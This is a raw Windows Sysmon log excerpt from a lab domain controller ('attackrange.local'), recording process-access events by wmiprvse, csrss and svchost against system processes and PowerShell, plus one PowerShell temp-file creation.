16:53:44.904{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239125Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.904{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239124Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.904{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239123Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.904{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239122Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.904{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239121Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.904{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239120Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.904{05ADC7E1-6D98-603E-A4AA-00000000AD01}1333611324C:\Windows\system32\conhost.exe{05ADC7E1-6D98-603E-A3AA-00000000AD01}5948C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239119Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.904{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239118Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.888{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239117Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.888{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239116Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.888{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D98-603E-9FAA-00000000AD01}13544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239115Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.888{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239114Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.888{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D98-603E-9FAA-00000000AD01}13544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239113Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.888{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239112Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.888{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239111Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.888{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239110Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.888{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239109Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.888{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6D98-603E-A4AA-00000000AD01}13336C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002239108Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.888{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-6D98-603E-A3AA-00000000AD01}5948C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 11241100x80000000000000002239107Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.888{05ADC7E1-6D98-603E-A1AA-00000000AD01}9808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_suz440eb.43z.ps12021-03-02 16:53:44.875 10341000x80000000000000002239106Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.875{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239105Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.875{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239104Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.875{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239103Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.875{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239102Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.875{05ADC7E1-229D-6039-0500-00000000AD01}636752C:\Windows\system32\csrss.exe{05ADC7E1-6D98-603E-A3AA-00000000AD01}5948C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002239101Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 